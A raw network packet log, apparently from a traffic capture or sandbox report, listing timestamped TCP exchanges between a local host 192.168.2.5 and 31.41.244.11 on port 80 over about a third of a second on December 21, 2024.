                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.639959097 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.641619921 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.641674995 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.641746998 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.641794920 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.643515110 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.643565893 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.643583059 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.643635988 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.645354033 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.645407915 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.645441055 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.645488977 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.647201061 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.647268057 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.647428036 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.647481918 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.649063110 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.649112940 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.649198055 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.649246931 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.750555038 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.750614882 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.750627041 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.750667095 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.751082897 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.751132965 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.751225948 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.751277924 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.752922058 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.752978086 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.753065109 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.753113031 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.754594088 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.754640102 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.754724026 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.754801035 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.756169081 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.756205082 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.756232977 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.756283045 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.757476091 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.757529020 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.757533073 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.757574081 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.759224892 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.759277105 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.759280920 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.759347916 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.761008024 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.761092901 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.761145115 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.761146069 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.762691021 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.762758017 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.762830019 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.762880087 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.764385939 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.764444113 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.764537096 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.764586926 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.766033888 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.766092062 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.766165018 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.766232014 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.767680883 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.767735004 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.767791033 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.767851114 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.769278049 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.769329071 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.769381046 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.769426107 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.770834923 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.770900965 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.770939112 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.771002054 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.772368908 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.772417068 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.772479057 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.772595882 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.773884058 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.773960114 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.774104118 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.774156094 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.775381088 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.775448084 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.775537968 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.775585890 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.776926041 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.776984930 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.777034044 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.777077913 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.778438091 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.778502941 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.778561115 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.778647900 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.779995918 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.780051947 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.780055046 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.780097008 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.781476974 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.781527042 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.781575918 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.781626940 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.783010006 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.783066034 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.783097982 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.783145905 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.784550905 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.784589052 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.784624100 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.784625053 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.786056995 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.786128998 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.786178112 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.786228895 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.787544966 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.787599087 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.787615061 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.787650108 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.789033890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.789084911 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.789158106 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.789206982 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.790576935 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.790633917 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.790709019 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.790760994 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.792099953 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.792155027 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.792207003 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.792268038 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.793606997 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.793658972 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.793730974 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.793782949 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.795145035 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.795195103 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.795258999 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.795310974 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.796710014 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.796761036 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.796817064 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.796868086 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.798171043 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.798218012 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.798294067 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.798342943 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.799666882 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.799719095 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.799792051 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.799839973 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.801191092 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.801240921 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.801318884 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.801368952 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.802692890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.802764893 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.802789927 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.802838087 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.804236889 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.804287910 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.804354906 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.804415941 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.805741072 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.805795908 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.805942059 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.805994987 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.807265043 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.807329893 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.807471991 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.807526112 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.808780909 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.808832884 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.808896065 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.808934927 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.810290098 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.810350895 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.810395956 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.810445070 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.811830997 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.811882019 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.811893940 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.811944008 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.813323021 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.813374996 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.813452005 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.813499928 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.814852953 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.814908028 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.814985991 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.815037012 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.816359997 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.816414118 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.816487074 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.816534996 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.817878008 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.817945004 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.818048000 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.818095922 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.819386005 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.819461107 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.819516897 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.819577932 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.820910931 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.820966959 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.821027994 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.821080923 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.822460890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.822509050 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.822515965 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.822562933 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.823977947 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.824028969 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.824069023 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.824120045 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.825465918 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.825517893 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.825591087 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.825643063 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.827018023 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.827069044 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.827141047 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.827189922 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.828511953 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.828567028 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.828634024 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.828686953 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.830037117 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.830091000 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.830149889 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.830198050 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.831532001 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.831583023 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.947004080 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.947067976 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.947252989 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.947252989 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.947454929 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.947544098 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.947638035 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.947688103 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.948626995 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.948679924 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.948749065 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.948801041 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.949853897 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.949903011 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.949935913 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.949984074 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.951062918 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.951111078 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.951189995 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.951241016 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.952301979 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.952358007 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.952430964 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.952481031 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.953469038 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.953524113 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.953598976 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.953649998 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.954705954 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.954757929 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.954760075 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.954828024 CET4982880192.168.2.531.41.244.11
